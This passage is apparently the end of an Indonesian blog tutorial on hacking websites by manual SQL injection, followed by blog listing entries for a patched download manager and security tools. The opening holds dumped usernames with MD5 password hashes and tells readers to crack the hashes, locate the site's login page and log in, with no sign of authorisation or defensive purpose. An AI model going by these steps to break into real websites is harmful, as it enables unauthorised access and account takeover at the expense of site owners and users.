    user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D


    Saya kira hanya begitu saja, kurang lebih mohon maaf.. kalo ada kesalahan mohon diperbaiki :) wassalam :*

    Content Creator : Onix AQua


    Cara Hacking Website Dengan Teknik Manual SQL Injection

    By admin →


                                             idm 6.15 full patch

    Tags:

    idm 6.15 full patch

    By admin → Saturday, February 9, 2013


                                            web scarb :: tools

    Tags:

    web scarb :: tools

    By admin →


                                      netzob 0.4.1 :: toolkit

    Tags:

    netzob 0.4.1 :: toolkit

    By admin →